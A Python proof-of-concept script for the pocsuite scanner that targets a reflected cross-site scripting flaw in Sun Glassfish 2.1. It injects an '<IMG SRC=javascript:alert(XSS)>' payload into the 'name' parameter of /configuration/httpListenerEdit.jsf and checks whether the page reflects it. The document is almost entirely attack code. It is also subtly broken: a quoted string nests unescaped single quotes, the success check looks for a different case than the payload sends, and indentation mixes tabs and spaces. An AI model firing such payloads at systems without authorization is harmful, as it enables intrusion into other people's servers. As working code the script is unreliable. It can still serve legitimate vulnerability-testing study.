Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability

                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '85214'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2008-11-28'
    createDate = '2015-11-11'
    updateDate = '2015-11-11'
    references = ['http://www.sebug.net/vuldb/ssvid-85214']
    name = 'Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability'
    appPowerLink = 'N/A'
    appName = 'Sun Glassfish'
    appVersion = '2.1'
    vulType = 'XSS'
    desc = '''
		Sun Glassfish 2.1在/configuration/httpListenerEdit.jsf处由于参数过滤不严，存在XSS漏洞
    '''
    samples = ['']

    def _attack(self):
        result = {}
        #Write your code here

        return self.parse_output(result,'')

    def _verify(self):
		result = {}
        #记录错误信息
		info=""
		
		#验证的payload
		payload='<IMG SRC=javascript:alert(XSS)>'
		
		#漏洞验证的地址
		expUrl='{url}/configuration/httpListenerEdit.jsf?name={py}&configName=server-config'.format(url=self.url,py=payload)
		
		#发送验证请求
		try:
			response=req.get(expUrl)
			if 'javascript:alert(xss)' in response.content:
				result['VerifyInfo'] = {}
				result['VerifyInfo']['URL'] = expUrl
				info="XSS检测成功"
				return self.parse_output(result,info)
			else:
				info="漏洞测试失败"
				result={}
				return self.parse_output(result,info)
		except:
			info="漏洞请求出现异常"
			result={}
			return self.parse_output(result,info)

    def parse_output(self, result,info):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail(info)
        return output


register(TestPOC)